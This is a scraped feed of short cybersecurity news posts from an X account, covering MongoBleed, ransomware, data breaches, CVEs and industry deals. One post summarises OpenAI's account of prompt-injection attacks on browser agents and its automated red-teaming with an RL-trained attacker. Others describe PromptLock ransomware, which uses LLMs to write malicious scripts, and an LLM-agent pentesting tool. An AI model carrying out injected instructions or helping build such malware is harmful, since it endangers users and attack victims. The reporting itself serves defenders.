(credentials/tokens) can enable rapid lateral movement and follow-on compromise. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Cloud & Internet-Exposed MongoDB #" [X Link](https://x.com/ThreatSynop/status/2005775601928642775) 2025-12-29T22:59Z [--] followers, [---] engagements "🚨 Gentlemen Ransomware Disrupts Romanias Oltenia Energy Complex A ransomware attack on Dec [--] encrypted files and knocked key business IT services offline (ERP document management email website) at Romanias largest coal power producer while the national energy supply was not impacted. The company isolated affected systems notified authorities and is restoring from backups as it investigates potential data theft. 🕷 Malware: Gentlemen ransomware 🎯 Target: Romania / Energy # Category: #Ransomware #Gentlemen #Romania #Energy #CriticalInfrastructure #IncidentResponse #BCP #CyberCrime 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005776145241849944) 2025-12-29T23:01Z [--] followers, [--] engagements "🚨 US & Australia Confirm Active Exploitation of MongoBleed (CVE-2025-14847) US CISA and Australias ACSC warn attackers are actively exploiting MongoBleed a MongoDB zlib-related memory disclosure bug that can leak sensitive data (e.g. database passwords cloud secrets) from vulnerable internet-exposed deployments. CISA added it to the KEV catalog and set a federal patch deadline of Jan [--] signaling high-confidence real-world abuse. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (internet-exposed databases; cloud environments) # Category: #MongoDB #MongoBleed #CVE2025_14847" [X Link](https://x.com/ThreatSynop/status/2005777294242054539) 2025-12-29T23:05Z [--] followers, [---] engagements "🚨 Coupang to Split $1.17B in Vouchers After 33.7M-Account Data Breach Coupang will begin issuing four single-use vouchers totaling [-----] won ($34) per affected user starting Jan [--] [----] after a breach discovered in mid-November that originated on June [--] and exposed Korean customers PII (names emails addresses order info). Investigators say the suspect retained data from [----] accounts and even dumped a MacBook Air in a river to destroy evidence underscoring insider-risk and forensic challenges at scale. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #PII" [X Link](https://x.com/ThreatSynop/status/2005777838176075927) 2025-12-29T23:07Z [--] followers, [--] engagements "🚨 CrowdStrike Launches Falcon for IT Turnkey Automations (GA) CrowdStrike says Falcon for IT now offers generally available turnkey automations (prebuilt content packs) to automate common IT/security workflowslike application resilience/health checks file indexing for investigations and Linux device controlwithout custom scripting. This reduces operational overhead and speeds response by running automation through the existing Falcon sensor and providing dashboards to track outcomes. 🕷 Malware: N/A 🎯 Target: Global / Enterprise IT & SOC Operations # Category: #CrowdStrike #Falcon" [X Link](https://x.com/ThreatSynop/status/2005793005567897912) 2025-12-30T00:08Z [--] followers, [--] engagements "🚨 70000+ MongoDB Servers Exposed to MongoBleed zlib Memory-Leak Attacks MongoDBs CVE-2025-14847 allows unauthenticated attackers to leak uninitialized heap memory via zlib-compressed traffic potentially exposing secrets like credentials and API keys from vulnerable internet-facing instances. Immediate upgrades (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression are the primary mitigations. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Internet-exposed MongoDB # Category: #MongoDB #MongoBleed #CVE2025_14847 #Vulnerability #Exploit" [X Link](https://x.com/ThreatSynop/status/2005885897963679867) 2025-12-30T06:17Z [--] followers, [--] engagements "🚨 Executives Say Cybersecurity Has Outgrown IT: Risk Now Drives Strategy A Rimini Street global exec survey shows cyber threats are now the top external risk (54%) pushing security into enterprise risk management and continuity planningwhile talent gaps and vendor pressure widen exposure. 43% already outsource cybersecurity (46% considering it) and 35% cite vendor lock-in/forced upgrades as a risk driver. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Leadership (Board C-suite critical sectors) # Category: #CyberRisk #CISO #RiskManagement #SecurityStrategy #Outsourcing #TalentGap" [X Link](https://x.com/ThreatSynop/status/2005901602524184929) 2025-12-30T07:19Z [--] followers, [--] engagements "🚨 Korean Air Employee Data Stolen After Oracle EBS Breach at Catering Supplier KC&D Korean Air says attackers stole data for [-----] current/former employees (including names and bank account numbers) after compromising its former subsidiary and current catering supplier KC&D which has been linked to the wider Oracle E-Business Suite (EBS) exploitation/extortion campaign. The incident underscores vendor concentration risk in aviation and how enterprise app zero-days can rapidly translate into high-impact employee fraud exposure. 🕷 Malware: N/A 🎯 Target: South Korea / Aviation (Employees) #" [X Link](https://x.com/ThreatSynop/status/2005932471192318282) 2025-12-30T09:22Z [--] followers, [--] engagements "🚨 ServiceNow Buys Armis for $7.75B to Build an End-to-End Cyber-Physical Security Platform ServiceNow agreed to acquire Armis in a $7.75B all-cash deal to expand exposure management and cyber-physical security across IT OT and medical devices. The goal is deeper asset visibility and faster risk prioritization via ServiceNows security workflows as AI adoption increases attack surface complexity. 🕷 Malware: N/A 🎯 Target: Global / Enterprise (IT+OT+Medical devices) # Category: #ServiceNow #Armis #MergersAndAcquisitions #CyberPhysicalSecurity #ExposureManagement #OTSecurity #MedDeviceSecurity" [X Link](https://x.com/ThreatSynop/status/2005934649579577694) 2025-12-30T09:31Z [--] followers, [--] engagements "🚨 CISA Loses Key Staffer Behind Pre-Ransomware Warnings Program CISAs Pre-Ransomware Notification Initiative (PRNI)which alerts organizations when ransomware actors are preparing to strikefaces uncertainty after its lead David Stern resigned following a forced reassignment. The program has issued thousands of warnings since [----] and CISA estimates it helped prevent roughly $9B in economic damages so disruption could reduce early-warning coverage for critical sectors. 🕷 Malware: N/A 🎯 Target: USA / Government & Critical Infrastructure # Category: #CISA #Ransomware #ThreatIntel" [X Link](https://x.com/ThreatSynop/status/2005935738160865464) 2025-12-30T09:35Z [--] followers, [--] engagements "🚨 Palo Alto Networks: AI Security Is Really a Cloud Infrastructure Problem A Palo Alto Networks survey says 99% of organizations saw at least one attack on AI systems in the past year and argues most of the real risk sits in the cloud foundations (identity permissions and monitoring) that run AI workloads. It recommends prioritizing identity security and integrating cloud telemetry directly into SOC workflows to reduce AI-driven exposure. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Cloud & AI Workloads # Category: #AISecurity #CloudSecurity #PaloAltoNetworks #IAM #SOC #GenAI" [X Link](https://x.com/ThreatSynop/status/2005935800031101065) 2025-12-30T09:35Z [--] followers, [--] engagements "🚨 How to Operationalize AI in the SOC: [--] Workflows That Actually Benefit The article lays out practical ways to embed AI into SOC operationsdetection engineering threat hunting code/tooling support orchestration design and reportingwhile warning that out-of-the-box AI and unvalidated outputs create fragile unsafe workflows. The key message: narrowly scope AI use cases enforce human review gates for actions and standardize prompts/guardrails so AI outputs are testable and repeatable. 🕷 Malware: N/A 🎯 Target: Global / SOC & Enterprise Security Operations # Category: #SOC #AISecurity" [X Link](https://x.com/ThreatSynop/status/2005959665234940078) 2025-12-30T11:10Z [--] followers, [--] engagements "🚨 70000+ MongoDB Servers Still Vulnerable to MongoBleed (CVE-2025-14847) MongoBleed is a zlib-related unauthenticated memory disclosure flaw that can leak sensitive heap data (credentials tokens keys) from vulnerable MongoDB deployments with large numbers of internet-exposed instances still at risk. The key action is immediate patching to fixed builds (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression as a temporary mitigation. 🕷 Malware: N/A (Vulnerability: MongoBleed / CVE-2025-14847) 🎯 Target: Global / Internet-Exposed MongoDB # Category: #MongoDB" [X Link](https://x.com/ThreatSynop/status/2005959728673792417) 2025-12-30T11:10Z [--] followers, [--] engagements "🚨 CISA Flags Actively Exploited MongoDB MongoBleed Flaw in KEV CISA added CVE-2025-14847 to the KEV catalog after active exploitation warning it lets unauthenticated attackers read uninitialized heap memory via a Zlib header length-handling inconsistencypotentially leaking credentials/tokens from exposed MongoDB servers. Federal agencies must remediate by Jan [--] [----] (BOD 22-01) making immediate patching/mitigation a priority for all internet-facing deployments. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB Servers # Category: #MongoDB #MongoBleed #CVE2025_14847 #KEV" [X Link](https://x.com/ThreatSynop/status/2005976043467772135) 2025-12-30T12:15Z [--] followers, [--] engagements "🚨 [----] Cybersecurity M&A Mega-Deals: [--] Acquisitions Cleared the $1B Mark SecurityWeek tallied 420+ cybersecurity M&A deals in [----] ( $84B disclosed) with eight $1B+ transactions driving nearly $75Bled by Googles $32B Wiz deal and Palo Alto Networks $25B CyberArk buy. The consolidation signals buyers prioritizing cloud identity and data-security platforms as must-have control planes for [----]. 🕷 Malware: N/A 🎯 Target: Global / Cybersecurity Industry (M&A) # Category: #Cybersecurity #MergersAndAcquisitions #MAndA #CloudSecurity #IdentitySecurity #DSPM #OTSecurity #MarketTrends 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005991205469929803) 2025-12-30T13:15Z [--] followers, [--] engagements "🚨 LG Unveils Gallery TV to Challenge Samsungs The Frame at CES [----] LG is entering the art TV market with a flush-mount Frame-style Gallery TV built on Mini-LED with a matte/anti-glare screen interchangeable frames and a Gallery+ art subscription to display curated artwork when idle. The move signals intensifying competition in lifestyle TVs where always-on display modes and ecosystem services (art stores apps smart-home integration) are becoming the differentiatorsnot just panel tech. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home TV market) # Category: #LG #GalleryTV" [X Link](https://x.com/ThreatSynop/status/2006023649371849109) 2025-12-30T15:24Z [--] followers, [--] engagements "🚨 TCL Note A1 NXTPAPER: Digital Paper Tablet Brings 120Hz Full-Color Paper-Like Reading/Writing TCL announced the Note A1 NXTPAPER combining its NXTPAPER paper-like display tech with a full-color LCD and a 120Hz refresh rate to reduce ghosting while staying eye-comfort focused for long reading and stylus work. Its positioned as a Kindle Scribe/reMarkable alternative with productivity features (stylus + meeting transcription/translation) and is expected to launch via crowdfunding soon. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tech (Tablets e-notes productivity) # Category: #TCL #NXTPAPER" [X Link](https://x.com/ThreatSynop/status/2006024740071149999) 2025-12-30T15:29Z [--] followers, [--] engagements "🚨 Legends Never Die: A Backstage Pass to Broadcoms [----] Cybersecurity Tour Broadcoms Symantec and Carbon Black recap their [----] Legends Never Die conference circuit (e.g. Google Cloud Next RSAC Black Hat/DEF CON) emphasizing AI/ML-driven defense demos partner ecosystem wins and updated threat intel messaging. Its essentially a marketing-driven field report on how theyre positioning enterprise security offerings and AI capabilities heading into [----]. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Security Teams & Channel Partners # Category: #Cybersecurity #ThreatIntel #SOC #AI #XDR" [X Link](https://x.com/ThreatSynop/status/2006025284907106389) 2025-12-30T15:31Z [--] followers, [--] engagements "🚨 Trend Micro Helps INTERPOLs Operation Sentinel Bust Africa-Linked Digital Extortion Networks Trend Micro says its intel mapped 2700+ malicious infrastructures/IPs and detected 43000+ digital extortion email attempts tied to Africa-region senders supporting INTERPOLs Operation Sentinel that led to [---] arrests and $3M recovered. The campaign data shows extortion lures were primarily English/Portuguese and largely targeted victims outside Africa (notably the Americas and Europe) highlighting cross-continental monetization and the need for stronger email controls and takedown coordination. 🕷" [X Link](https://x.com/ThreatSynop/status/2006026437078200672) 2025-12-30T15:35Z [--] followers, [--] engagements "🚨 HoneyMyte (Mustang Panda) Uses Signed Kernel Rootkit to Stealth-Deploy ToneShell Kaspersky reports the HoneyMyte/Mustang Panda cluster using a signed Windows mini-filter driver (ProjectConfiguration.sys) to blind Microsoft Defender and inject the ToneShell backdoor into a decoy svchost process with C2 traffic disguised as fake TLS [---] over TCP/443. This kernel-mode delivery boosts persistence and evasion raising incident-response difficulty for targeted government networks in Myanmar and Thailand. 🕷 Malware: ToneShell (kernel-mode rootkit loader) 🎯 Target: Asia / Government (Myanmar" [X Link](https://x.com/ThreatSynop/status/2006042689385472039) 2025-12-30T16:40Z [--] followers, [--] engagements "🚨 Samsung Previews CES [----] Home Audio: New Q-Series Soundbars + Music Studio Wi-Fi Speakers Samsung is teasing its [----] audio lineup ahead of CES adding refreshed Q-Series soundbars and new Music Studio Wi-Fi speakers aimed at tighter SmartThings/TV integration and more immersive AI-tuned playback. The update reinforces the ecosystem audio trend where speakers and soundbars operate as coordinated endpoints across TVs and smart-home routines. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home Audio) # Category: #Samsung #CES2026 #Soundbars #WiFiSpeakers #SmartThings #HomeAudio" [X Link](https://x.com/ThreatSynop/status/2006043233978110001) 2025-12-30T16:42Z [--] followers, [--] engagements "🚨 OpenAI: Prompt Injection May Never Be Solved for Browser Agents Like ChatGPT Atlas OpenAI says it shipped a security update after internal automated red-teaming uncovered a new class of prompt-injection attacks adding an adversarially trained model and stronger safeguards. It now uses an RL-trained automated attacker plus counterfactual rollouts to iterate on multi-step injection chains before they appear in the wild. 🕷 Malware: N/A 🎯 Target: Global / AI Browser Agents (Enterprise workflows: email docs web apps) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity" [X Link](https://x.com/ThreatSynop/status/2006043780294840560) 2025-12-30T16:44Z [--] followers, [--] engagements "🚨 Magecart Fake Checkout Surge: 50+ Malicious Scripts Hijack Payment Flows A large-scale Magecart operation is using 50+ modular JavaScript skimmers that detect the victims payment gateway (e.g. Stripe/PayPal/Mollie) and dynamically inject localized fake payment forms to steal card and account data while evading modern defenses. 🕷 Malware: Magecart (malicious web skimmer scripts) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart #Ecommerce #WebSkimming #JavaScript #PaymentFraud #SupplyChain #Infostealer #DigitalSkimmer 🔗 URL: https://gbhackers.com/magecart-campaign/" [X Link](https://x.com/ThreatSynop/status/2006068320349401352) 2025-12-30T18:22Z [--] followers, [--] engagements "🚨 ESET Warns AI-Powered Malware Is Now Operational PromptLock Signals a New Ransomware Era ESET reports that AI-driven malware is no longer theoretical spotlighting PromptLock ransomware that can call LLMs (via the Ollama API) to generate and iteratively fix malicious Lua scripts at runtime undermining signature-based detection. The same report also flags a sharp expansion in ransomware activity and a surge in BYOVD-style EDR-killer tooling increasing the likelihood of fast scalable intrusions across multiple sectors. 🕷 Malware: PromptLock (AI-powered ransomware) 🎯 Target:" [X Link](https://x.com/ThreatSynop/status/2006069419261219326) 2025-12-30T18:26Z [--] followers, [--] engagements "🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915 CVSS 9.8) A critical authentication bypass in IBM API Connect lets remote attackers gain unauthorized access without credentials impacting versions 10.0.8.010.0.8.5 and 10.0.11.0. Patch immediately (apply IBM iFix/security updates) and if you cant patch yet disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity #PatchNow #DevSecOps 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006069481995374684) 2025-12-30T18:26Z [--] followers, [--] engagements "🚨 CISA Flags Active Exploitation of MongoBleed (CVE-2025-14847) in MongoDB CISA added CVE-2025-14847 to its KEV catalog after real-world exploitation was observed; the flaw stems from zlib-compressed protocol header length handling and can let unauthenticated attackers read uninitialized heap memory potentially leaking credentials tokens or sensitive data from exposed MongoDB servers. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) # Category: #MongoDB #CVE202514847 #MongoBleed #CISA #KEV #Vulnerability #DataLeak #DatabaseSecurity #PatchNow 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006071176188023052) 2025-12-30T18:33Z [--] followers, [--] engagements "🚨 Massive Magecart Wave: 50+ Web Skimmers Inject Fake Checkout Pages Researchers report a large Magecart operation using 50+ distinct malicious JavaScript skimmers that fingerprint the victim sites payment flow and dynamically inject localized fake checkout forms to steal card data and credentials while evading detection. The scale and modular design makes this a high-impact e-commerce supply-chain risk especially for sites relying on third-party scripts and tag managers. 🕷 Malware: Magecart (web skimmer JavaScript) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart" [X Link](https://x.com/ThreatSynop/status/2006097405649788955) 2025-12-30T20:17Z [--] followers, [--] engagements "🚨 Coupang Offers $1.17B in Vouchers After Massive 33.7M-Account Data Breach Coupang will issue four vouchers totaling [-----] won ($1.17B aggregate) to [----] million notified account holders starting Jan [--] after a breach that began June [--] [----] and exposed personal data (names email phone addresses some order history) but reportedly not payment or login credentialshighlighting escalating regulatory class-action and trust risk for major consumer platforms. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Logistics # Category: #DataBreach #Coupang #Korea #Privacy #PII #IncidentResponse" [X Link](https://x.com/ThreatSynop/status/2006112575512273356) 2025-12-30T21:18Z [--] followers, [--] engagements "🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915) Exposes API Gateways to Remote Takeover IBM warns of an authentication-bypass flaw (CVSS 9.8) that could let unauthenticated remote attackers access IBM API Connect potentially enabling configuration tampering and downstream compromise of managed APIs. Affected versions (10.0.8.010.0.8.5 and 10.0.11.0) should apply IBM iFixes immediately; if patching is delayed disable Developer Portal self-service sign-up as a temporary mitigation. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915" [X Link](https://x.com/ThreatSynop/status/2006135830750822902) 2025-12-30T22:50Z [--] followers, [--] engagements "🚨 Critical SmarterMail Flaw Lets Unauthenticated Attackers Upload Files and Potentially Achieve RCE CVE-2025-52691 (CVSS 10.0) allows unauthenticated arbitrary file upload to any location on SmarterMail servers which can be chained into remote code execution and full mail server takeover. SmarterTools says builds before [----] are affected and urges upgrading to Build 9413+ immediatelyespecially for internet-facing mail servers. 🕷 Malware: N/A 🎯 Target: Global/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #ArbitraryFileUpload #EmailSecurity" [X Link](https://x.com/ThreatSynop/status/2006136374814994703) 2025-12-30T22:52Z [--] followers, [---] engagements "🚨 CISA Flags Actively Exploited MongoBleed Bug in MongoDB Server (CVE-2025-14847) CVE-2025-14847 is a zlib-compressed protocol header length-handling flaw that lets unauthenticated attackers remotely read uninitialized heap memory potentially leaking credentials session tokens or encryption keys from exposed MongoDB servers. CISA added it to the KEV catalog on Dec [--] [----] and set a Jan [--] [----] remediation deadlinemaking urgent patching and credential rotation a priority for any internet-facing instances. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) #" [X Link](https://x.com/ThreatSynop/status/2006136919168598271) 2025-12-30T22:54Z [--] followers, [--] engagements "🚨 PoC Released for MongoBleed: 74K+ Exposed MongoDB Servers Still Unpatched A public proof-of-concept for CVE-2025-14847 (MongoBleed) is driving urgency as Shadowserver reports [-----] internet-exposed MongoDB instances still running vulnerable versions. The bug enables unauthenticated heap-memory disclosure via MongoDBs zlib-compressed protocol handling risking leakage of sensitive in-memory data unless servers are urgently patched or zlib compression is disabled as a temporary mitigation. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-exposed MongoDB) # Category:" [X Link](https://x.com/ThreatSynop/status/2006138009586917672) 2025-12-30T22:59Z [--] followers, [---] engagements "🚨 Ex-Coupang Insider Tosses MacBook in River to Destroy Evidence After Massive Data Breach A former Coupang employee allegedly used a stolen security key to access customer records then smashed and dumped a MacBook Air weighted with bricks to erase tracesbut investigators recovered the device and tied it to the suspect via serial number/iCloud. The case underscores how insider access + poor key controls can drive mega-breaches and how forensics can still reconstruct activity even after attempted physical destruction. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Consumer Data #" [X Link](https://x.com/ThreatSynop/status/2006138552841625741) 2025-12-30T23:01Z [--] followers, [--] engagements "🚨 Critical 0-Day Root RCE in XSpeeder Devices Exposes 70000+ Hosts CVE-2025-54322 is an unauthenticated root RCE in XSpeeder SXZOS devices where a web-auth component uses unsafe eval() on base64-decoded query input enabling one-request command execution and rapid perimeter compromise. With 70K internet-exposed systems and an unresponsive vendor defenders should urgently isolate/ACL these devices and hunt for web-shell-like artifacts and suspicious GET-based payload attempts. 🕷 Malware: N/A 🎯 Target: Global/Industrial & Branch Networking (XSpeeder SXZOS) # Category: #ZeroDay #RCE" [X Link](https://x.com/ThreatSynop/status/2006140187995144420) 2025-12-30T23:07Z [--] followers, [--] engagements "🚨 Logitech Zone Wireless [--] ES Review: Business Headset Built to Tame Noisy Open Offices Logitechs Zone Wireless [--] ES is positioned as an ANC-forward headset for clearer enterprise calls in loud environments improving meeting confidentiality and voice intelligibility. The security tradeoff is added endpoint surface (Bluetooth/dongle firmware and UC integrations) so it should be managed like any other corporate peripheral (updates device controls and policy). 🕷 Malware: N/A 🎯 Target: Global/Enterprise (Unified Communications & Open Office) # Category: #Logitech #Headset #ANC" [X Link](https://x.com/ThreatSynop/status/2006193640012447947) 2025-12-31T02:40Z [--] followers, [--] engagements "🚨 Defenders Falling Behind: Threat-Led Data Shows Attackers Evolve Faster Than Coverage Tidal Cybers [----] Threat-Led Defense Report finds adversaries rapidly shifting TTP execution (cloud/SaaS abuse social engineering resurgence ransomware fragmentation and broader zero-day use) creating procedure-level blind spots where controls miss real intrusions even when the technique is known. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #ThreatIntel #ThreatLedDefense #TTPs #MITREATTACK #Ransomware #SocialEngineering #ZeroDay #SaaS #CloudSecurity #TidalCyber 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006255310856401015) 2025-12-31T06:45Z [--] followers, [--] engagements "🚨 AI-Enhanced InternalWhisper Crypter Markets FUD Evasion Against Windows Defender A new dark-web crypter/loader called InternalWhisper x ImpactSolutions claims an AI-driven metamorphic engine that rewrites 99% of code per build producing signature-less binaries while using AES-256 runtime encryption and stealth loaders (direct syscalls process hollowing signed-binary sideloading) to evade AV/EDRreducing the effectiveness of static detection and accelerating commodity malware deployment. 🕷 Malware: InternalWhisper x ImpactSolutions (AI-enhanced crypter/loader) 🎯 Target: Global/Windows" [X Link](https://x.com/ThreatSynop/status/2006255857378501043) 2025-12-31T06:47Z [--] followers, [--] engagements "🚨 AdaptixC2 v1.0 Ships Major Tunnel + UI Upgrades Boosting C2 Operator Speed AdaptixC2 v1.0 overhauls SOCKS4/5 tunneling to be RFC-compliant adds IPv6 support and improves client responsiveness via async execution/text batchingmaking port-scans and pivoting more reliable and faster. It also adds remote shell/SSH-like terminal tabs plus new BOFs (LDAP DCSync nbtscan runas) and introduces breaking DB changes which matters because better legit red team tooling is routinely repurposed by real attackers. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Monitoring" [X Link](https://x.com/ThreatSynop/status/2006256401413193934) 2025-12-31T06:49Z [--] followers, [--] engagements "🚨 AdaptixC2 v1.0 Released With Faster More Reliable Tunneling and UI Upgrades AdaptixC2s latest release improves SOCKS4/5 tunneling (RFC compliance) adds IPv6 support and boosts responsiveness via async client/server operations and text batching to prevent UI freezes. It also introduces a new profile system with autosave updated session/listener management and database-size controls that defenders should account for when hunting C2 activity. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Red Teams & Post-Exploitation Operations # Category: #AdaptixC2 #C2 #PostExploitation #RedTeam" [X Link](https://x.com/ThreatSynop/status/2006273195167326558) 2025-12-31T07:56Z [--] followers, [--] engagements "🚨 Open-Source AdaptixC2 v1.0 Launches With Faster SOCKS Tunnels and New BOFs AdaptixC2s v1.0 release improves SOCKS4/5 tunneling stability adds IPv6 support and introduces UI/workflow upgrades (async execution terminal tabs) plus new Beacon Object Files like LDAP and DCSyncfeatures that can materially increase attacker/operator efficiency if abused outside legitimate red teaming. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Defending Against Post-Exploitation C2 # Category: #AdaptixC2 #C2 #RedTeam #PostExploitation #SOCKS5 #IPv6 #BOF #ThreatHunting 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006273740020060507) 2025-12-31T07:58Z [--] followers, [--] engagements "🚨 Dark-Web InternalWhisper AI Crypter Claims FUD Evasion by Metamorphic Rewrites A threat actor is advertising InternalWhisper x ImpactSolutions an AI-enhanced metamorphic crypter that claims to generate signature-free builds by rewriting code per build encrypting payloads (AES-256) and using in-memory execution plus techniques like direct syscalls/process hollowing and signed-binary sideloading. If real it accelerates commodity malware at scale by degrading static detection and pushing defenders toward behavioral/telemetry-driven controls. 🕷 Malware: InternalWhisper x ImpactSolutions" [X Link](https://x.com/ThreatSynop/status/2006274283924840459) 2025-12-31T08:00Z [--] followers, [--] engagements "🚨 Critical Apache StreamPipes Flaw Lets Users Hijack Admin Accounts (CVE-2025-47411) A privilege-escalation bug in Apache StreamPipes (0.69.00.97.0) allows any authenticated non-admin to manipulate JWT/token user identity (e.g. swapping their username to an existing admin) and gain full administrative control enabling data access/tampering and pipeline compromise; upgrade to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics Platforms (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability" [X Link](https://x.com/ThreatSynop/status/2006281895789674500) 2025-12-31T08:30Z [--] followers, [--] engagements "🚨 Critical Apache StreamPipes Bug Lets Low-Privilege Users Hijack Admin Control CVE-2025-47411 impacts Apache StreamPipes 0.69.00.97.0 allowing any authenticated non-admin to manipulate JWT/user-ID handling to impersonate an existing administrator and take over the platform. Upgrade to 0.98.0 immediately to prevent full pipeline/data tampering and backdoor account creation. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow #DataSecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006290116550017062) 2025-12-31T09:03Z [--] followers, [--] engagements "🚨 MongoBleed Exploitation Hotspots: U.S. China and EU Lead Global Exposure MongoBleed (CVE-2025-14847) is a pre-auth zlib compression flaw in MongoDB that lets attackers remotely leak uninitialized process memory (e.g. credentials/tokens) from unpatched servers with large concentrations of exposed instances in China and the U.S. The bug is already being exploited prompting CISA KEV inclusion and rapid patching/mitigation pressure across cloud and hosting providers. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (US China EU-heavy exposure) # Category: #MongoDB #MongoBleed" [X Link](https://x.com/ThreatSynop/status/2006297728062468323) 2025-12-31T09:33Z [--] followers, [--] engagements "🚨 Mapping the Next Cold War: Why US Strategy on China and Russia Must Get Specific WIRED argues the US has drifted without a coherent grand strategy for great-power competition with China and Russia and that treating today as a simple Cold War analogy obscures key differences like economic interdependence and the rise of nonaligned mid-powers. 🕷 Malware: N/A 🎯 Target: Global/Geopolitics () # Category: #Geopolitics #NationalSecurity #ColdWar #China #Russia #USPolicy #CyberPolicy 🔗 URL: https://www.wired.com/story/discovering-the-dimensions-of-a-new-cold-war/" [X Link](https://x.com/ThreatSynop/status/2006313432975331722) 2025-12-31T10:36Z [--] followers, [--] engagements "🚨 NeuroSploit v2: AI-Powered Pentesting Framework Using GPT/Claude/Gemini/Ollama NeuroSploit v2 is a modular GitHub-hosted framework that uses specialized LLM agents (red team bug bounty malware analyst blue team) and integrates tools like Nmap Metasploit Nuclei and SQLMap to accelerate recon and vulnerability analysis. Its main risk is operational: it can compress high-skill workflows into repeatable playbooks so defenders should expect faster time-to-exploit and prioritize behavioral detection and strict tool/use governance. 🕷 Malware: NeuroSploit v2 (tool) 🎯 Target: Global/Offensive" [X Link](https://x.com/ThreatSynop/status/2006331985065546103) 2025-12-31T11:49Z [--] followers, [--] engagements "🚨 LinkedIn Job Scams Surge Globally: Fake Recruiters Monetize Jobseekers Desperation Fraudsters posing as employers on LinkedIn persuade applicants to pay fees (background checks onboarding training visa processing) with tactics varying by region and often escalating into credential theft or identity-fraud exposure. The bigger risk is organizational: stolen LinkedIn accounts and harvested personal data enable highly believable BEC-style impersonation and targeted spear-phishing into real companies. 🕷 Malware: N/A 🎯 Target: Global/Jobseekers & Recruiting (Social Media Platforms) # Category:" [X Link](https://x.com/ThreatSynop/status/2006347213371269363) 2025-12-31T12:50Z [--] followers, [--] engagements "🚨 Shai-Hulud Supply Chain Worm Fueled $8.5M Trust Wallet Chrome Extension Heist Trust Wallet says Shai-Hulud [---] leaked its developer GitHub secrets letting attackers use a stolen Chrome Web Store API key to publish a backdoored Trust Wallet extension (v2.68) that pulled malicious code from an attacker domain and drained [----] wallets ($8.5M) between Dec 2426highlighting how npm/GitHub credential theft can directly translate into consumer crypto theft via compromised release pipelines. 🕷 Malware: Shai-Hulud [---] (self-replicating npm supply-chain worm) + backdoored Trust Wallet Chrome" [X Link](https://x.com/ThreatSynop/status/2006347757791899852) 2025-12-31T12:52Z [--] followers, [--] engagements "🚨 Cl0p Leaks [-----] Korean Air Employee Records After Third-Party ERP Breach Cl0p claims it compromised Korean Airs catering partner KC&D Service by exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882) then leaked employee names and bank account numbers from the partners ERP server (hundreds of GB posted after alleged ransom refusal). This is high-risk for payroll fraud and targeted phishing and it highlights third-party ERP weak links as a repeatable intrusion path. 🕷 Malware: Cl0p (ransomware/extortion group) 🎯 Target: South Korea/Aviation (employee PII via third-party" [X Link](https://x.com/ThreatSynop/status/2006348301185016073) 2025-12-31T12:54Z [--] followers, [---] engagements "🚨 [----] Cybersecurity Forecast: AI Arms Race and Autonomous Self-Learning Malware Dark Reading predicts [----] will see attackers scale AI-driven phishing deepfakes and automated vuln exploitation while defenders race to deploy agentic automation for detection and containment. It warns of emerging malware autonomy (self-learning tactic-shifting worms) and accelerating vendor consolidation/platformization that could reshape how security teams buy and operate tooling. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #CyberPredictions #AI #AgenticAI #AutonomousMalware #ThreatLandscape" [X Link](https://x.com/ThreatSynop/status/2006348843965714692) 2025-12-31T12:56Z [--] followers, [--] engagements "🚨 Qilin Ransomware Claims New Breaches Across Israel and the U.S. The Qilin ransomware group alleges it breached three organizationsTaLachaim (Israel stem cell 